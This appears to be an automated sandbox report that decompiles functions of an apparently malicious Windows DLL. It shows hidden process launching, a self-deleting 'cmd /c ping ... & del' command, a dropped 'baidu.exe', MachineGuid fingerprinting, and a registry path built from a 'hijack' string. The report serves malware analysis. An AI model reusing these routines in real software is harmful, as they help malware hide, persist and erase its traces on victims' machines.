                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FF6A
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FF87
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FFA7
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FFD7
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNELBASE ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                  • String ID: %s%s %s %s$0011
                                                                                                                                                                  • API String ID: 3552933064-2132516514
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A230(void* __eflags, CHAR* _a4) {
                                                                                                                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                  				CHAR* _v24;
                                                                                                                                                                  				struct _STARTUPINFOA _v100;
                                                                                                                                                                  				int _t18;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				E1000CF80(_t27,  &_v100, 0, 0x44);
                                                                                                                                                                  				_v100.cb = 0x44;
                                                                                                                                                                  				_v100.dwFlags = 1;
                                                                                                                                                                  				_v100.wShowWindow = 0;
                                                                                                                                                                  				E1000CF80(_t27,  &_v20, 0, 0x10);
                                                                                                                                                                  				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20); // executed
                                                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                                                  					CloseHandle(_v20.hThread);
                                                                                                                                                                  					CloseHandle(_v20);
                                                                                                                                                                  					_v24 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v24;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                                  • String ID: D
                                                                                                                                                                  • API String ID: 1151464618-2746444292
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A2C0() {
                                                                                                                                                                  				char _v267;
                                                                                                                                                                  				char _v268;
                                                                                                                                                                  				char _v531;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				int _t15;
                                                                                                                                                                  				void* _t20;
                                                                                                                                                                  
                                                                                                                                                                  				_v532 = 0;
                                                                                                                                                                  				E1000CF80(_t20,  &_v531, 0, 0x103);
                                                                                                                                                                  				_v268 = 0;
                                                                                                                                                                  				E1000CF80(_t20,  &_v267, 0, 0x103);
                                                                                                                                                                  				GetModuleFileNameA(0,  &_v532, 0x104);
                                                                                                                                                                  				E1000CCA3(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
                                                                                                                                                                  				_t15 = WinExec( &_v268, 0); // executed
                                                                                                                                                                  				return _t15;
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A31E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                                  • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                                  • API String ID: 2874319085-10483710
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E1001A660(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                  				struct HINSTANCE__* _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				char _v52;
                                                                                                                                                                  				char _v53;
                                                                                                                                                                  				short _v55;
                                                                                                                                                                  				char _v59;
                                                                                                                                                                  				char _v63;
                                                                                                                                                                  				char _v67;
                                                                                                                                                                  				char _v71;
                                                                                                                                                                  				char _v72;
                                                                                                                                                                  				char _v335;
                                                                                                                                                                  				char _v336;
                                                                                                                                                                  				signed int _v340;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                                  				void* _t45;
                                                                                                                                                                  				intOrPtr _t73;
                                                                                                                                                                  
                                                                                                                                                                  				_t80 = __eflags;
                                                                                                                                                                  				_t71 = __edi;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E1002315C);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t73;
                                                                                                                                                                  				_v340 = 0;
                                                                                                                                                                  				E10001160( &_v52, __eflags, 0x10025ca1);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v336 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v335, 0, 0x103);
                                                                                                                                                                  				GetModuleFileNameA(0,  &_v336, 0x104);
                                                                                                                                                                  				_t40 = E1001A1D0( &_v336); // executed
                                                                                                                                                                  				_v24 = _t40;
                                                                                                                                                                  				_v72 = 0;
                                                                                                                                                                  				_v71 = 0;
                                                                                                                                                                  				_v67 = 0;
                                                                                                                                                                  				_v63 = 0;
                                                                                                                                                                  				_v59 = 0;
                                                                                                                                                                  				_v55 = 0;
                                                                                                                                                                  				_v53 = 0;
                                                                                                                                                                  				E1000CCA3(_t71,  &_v72, "%d", _v24);
                                                                                                                                                                  				_v20 = E1001A4E0(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
                                                                                                                                                                  				_t81 = _v20;
                                                                                                                                                                  				if(_v20 != 0) {
                                                                                                                                                                  					E10001AB0( &_v52, _t81, _v20);
                                                                                                                                                                  					E10001AB0( &_v52, _t81, ".exe");
                                                                                                                                                                  					_push(_v20);
                                                                                                                                                                  					E1000CA40(__ebx, _t71, __esi, _t81);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t45 = E10001200( &_v52);
                                                                                                                                                                  				_t82 = _t45;
                                                                                                                                                                  				if(_t45 == 0) {
                                                                                                                                                                  					E10001AB0( &_v52, _t82, "baidu.exe");
                                                                                                                                                                  				}
                                                                                                                                                                  				E10001110(_a4, _t82,  &_v52);
                                                                                                                                                                  				_v340 = _v340 | 0x00000001;
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				E100011A0( &_v52);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _a4;
                                                                                                                                                                  			}























                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A1D0: FindFirstFileA.KERNELBASE(1001A6D9,?), ref: 1001A1EE
                                                                                                                                                                    • Part of subcall function 1001A1D0: FindClose.KERNELBASE(000000FF), ref: 1001A216
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: .exe$baidu.exe
                                                                                                                                                                  • API String ID: 3164538923-2273953317
                                                                                                                                                                  • Opcode ID: 55ab466b0c901d54146a493d2a8252fd219c79ef87a46662c8a6c115446429cf
                                                                                                                                                                  • Instruction ID: e55bd592b59adb37ad85060a3931d0354643b17087754827cff962c307c3447c
                                                                                                                                                                  • Opcode Fuzzy Hash: 55ab466b0c901d54146a493d2a8252fd219c79ef87a46662c8a6c115446429cf
                                                                                                                                                                  • Instruction Fuzzy Hash: 56315BB5C10258ABEB04DBA0ED85FEEB7B4FF09740F400169F519A6281EB746A48CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E1001FE50(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				char _v311;
                                                                                                                                                                  				char _v312;
                                                                                                                                                                  				char _v575;
                                                                                                                                                                  				char _v576;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  
                                                                                                                                                                  				_t50 = __eflags;
                                                                                                                                                                  				_t41 = __edi;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E1002319D);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t43;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v576 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v575, 0, 0x103);
                                                                                                                                                                  				_v312 = 0;
                                                                                                                                                                  				E1000CF80(_t41,  &_v311, 0, 0x103);
                                                                                                                                                                  				E1001A660(__ebx, _t41, __esi, _t50,  &_v44); // executed
                                                                                                                                                                  				GetTempPathA(0x104,  &_v576);
                                                                                                                                                                  				_push(E100011E0( &_a4));
                                                                                                                                                                  				_push(E100011E0( &_v44));
                                                                                                                                                                  				E1000CCA3(_t41,  &_v312, "%s%s 200 %s",  &_v576);
                                                                                                                                                                  				E1001A230(_t50,  &_v312); // executed
                                                                                                                                                                  				E100011A0( &_v44);
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				_t30 = E100011A0( &_a4);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _t30;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FE8A
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FEA7
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FEC7
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FEF2
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNELBASE ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                  • String ID: %s%s 200 %s
                                                                                                                                                                  • API String ID: 3552933064-2772210913
                                                                                                                                                                  • Opcode ID: c5a6d00ce3aa5ea66f22295ded407cf218970161439a2ab676f88754d585d496
                                                                                                                                                                  • Instruction ID: fca78508d4ffe10e775a72f73cdab82aabd77a27c247e381faabbd00212866fc
                                                                                                                                                                  • Opcode Fuzzy Hash: c5a6d00ce3aa5ea66f22295ded407cf218970161439a2ab676f88754d585d496
                                                                                                                                                                  • Instruction Fuzzy Hash: C61186B6C00208ABEB14EBA0DC56FDD7778EB14750F4441A4F619A61C5EB787748CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E1001F9F0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char _v275;
                                                                                                                                                                  				char _v276;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				void* _t20;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  
                                                                                                                                                                  				_t37 = __eflags;
                                                                                                                                                                  				_t28 = __edi;
                                                                                                                                                                  				_v276 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v275, 0, 0x103);
                                                                                                                                                                  				_v12 = 0x104;
                                                                                                                                                                  				E1001A350( &_v276,  &_v12); // executed
                                                                                                                                                                  				E1000CDB3( &_v276,  &_v276, 0x104, "hijack");
                                                                                                                                                                  				_v8 = E1001A4E0(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
                                                                                                                                                                  				_t20 = E1000CCA3(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
                                                                                                                                                                  				_t38 = _v8;
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  					return E1000CA40(__ebx, _t28, __esi, _t38);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t20;
                                                                                                                                                                  			}











                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FA0E
                                                                                                                                                                    • Part of subcall function 1001A350: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FA41
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FA68
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                                  • API String ID: 3138967372-3622423033
                                                                                                                                                                  • Opcode ID: 5f933ddf6dabdaae646f14058590104521e6e07e27c6c3256ded00124ca53b5d
                                                                                                                                                                  • Instruction ID: 9d0dca558a4647b1c94e9ab51dbd61ee89e2acb8972101442078f4140e755168
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f933ddf6dabdaae646f14058590104521e6e07e27c6c3256ded00124ca53b5d
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F0152F9C0020CA7DB15D7A0EC46FE97778AB54304F0404A9A61856141E7B5AB88C792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A350(char* _a4, int* _a8) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				int* _v12;
                                                                                                                                                                  				long _t11;
                                                                                                                                                                  				long _t13;
                                                                                                                                                                  
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t11 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8); // executed
                                                                                                                                                                  				if(_t11 == 0) {
                                                                                                                                                                  					_t13 = RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8); // executed
                                                                                                                                                                  					if(_t13 == 0) {
                                                                                                                                                                  						_v12 = 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					RegCloseKey(_v8); // executed
                                                                                                                                                                  					return _v12;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}








                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
                                                                                                                                                                  • RegQueryValueExA.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A39C
                                                                                                                                                                  • RegCloseKey.KERNELBASE(00000000), ref: 1001A3B5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                                  • API String ID: 3677997916-880526231
                                                                                                                                                                  • Opcode ID: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
                                                                                                                                                                  • Instruction ID: 036869a64e7b96092babc19efb2470d9694155ef05369fbbd3590e376cbd9c8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
                                                                                                                                                                  • Instruction Fuzzy Hash: 99F01275600208FBEB10DFA0DC85F9D77B9EB08700F604148FA14AB280DB75DB81DB65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E1001F500(void* _a4, char* _a8) {
                                                                                                                                                                  				char* _v8;
                                                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				struct _SYSTEMTIME _v32;
                                                                                                                                                                  				char* _v40;
                                                                                                                                                                  				char* _v44;
                                                                                                                                                                  				struct _FILETIME _v52;
                                                                                                                                                                  				long _t27;
                                                                                                                                                                  				char* _t43;
                                                                                                                                                                  
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_t27 = RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16); // executed
                                                                                                                                                                  				if(_t27 == 0) {
                                                                                                                                                                  					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
                                                                                                                                                                  						_v32.wYear = 0x7b2;
                                                                                                                                                                  						_v32.wMonth = 1;
                                                                                                                                                                  						_v32.wDay = 1;
                                                                                                                                                                  						_v32.wHour = 0;
                                                                                                                                                                  						_v32.wMinute = 0;
                                                                                                                                                                  						_v32.wSecond = 0;
                                                                                                                                                                  						_v32.wMilliseconds = 0;
                                                                                                                                                                  						SystemTimeToFileTime( &_v32,  &_v52);
                                                                                                                                                                  						_t43 = _v8;
                                                                                                                                                                  						asm("sbb edx, [ebp-0x2c]");
                                                                                                                                                                  						_v44 = E1000F2F0(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
                                                                                                                                                                  						_v40 = _t43;
                                                                                                                                                                  					}
                                                                                                                                                                  					RegCloseKey(_v16);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v44;
                                                                                                                                                                  			}













                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000101,00000000), ref: 1001F52E
                                                                                                                                                                  • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F558
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F594
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F5AF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001F5BE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3147484438-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E1001F430(char* _a4) {
                                                                                                                                                                  				struct _SYSTEMTIME _v20;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                  				struct _FILETIME _v36;
                                                                                                                                                                  				struct _FILETIME _v44;
                                                                                                                                                                  				struct _FILETIME _v52;
                                                                                                                                                                  				struct _FILETIME _v60;
                                                                                                                                                                  				void* _v64;
                                                                                                                                                                  				int _t28;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t44;
                                                                                                                                                                  
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_t28 = PathFileExistsA(_a4); // executed
                                                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                                                  					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
                                                                                                                                                                  					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
                                                                                                                                                                  						_v20.wYear = 0x7b2;
                                                                                                                                                                  						_v20.wMonth = 1;
                                                                                                                                                                  						_v20.wDay = 1;
                                                                                                                                                                  						_v20.wHour = 0;
                                                                                                                                                                  						_v20.wMinute = 0;
                                                                                                                                                                  						_v20.wSecond = 0;
                                                                                                                                                                  						_v20.wMilliseconds = 0;
                                                                                                                                                                  						SystemTimeToFileTime( &_v20,  &_v60);
                                                                                                                                                                  						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                                  						asm("sbb eax, [ebp-0x34]");
                                                                                                                                                                  						_v28 = E1000F2F0(_t44, _v36.dwHighDateTime, 0x2710, 0);
                                                                                                                                                                  						_v24 = _t44;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v28;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.KERNELBASE(?), ref: 1001F448
                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F46C
                                                                                                                                                                  • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F48B
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F4C7
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F4E2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3038978132-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E10022DFB(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                  				void* _t72;
                                                                                                                                                                  				void* _t73;
                                                                                                                                                                  				void* _t76;
                                                                                                                                                                  				void* _t110;
                                                                                                                                                                  				void* _t112;
                                                                                                                                                                  
                                                                                                                                                                  				L0:
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					L0:
                                                                                                                                                                  					_t109 = __esi;
                                                                                                                                                                  					_t108 = __edi;
                                                                                                                                                                  					_t77 = __ebx;
                                                                                                                                                                  					 *((intOrPtr*)(_t110 - 0x2c)) =  *((intOrPtr*)(_t110 - 0x2c)) + 1;
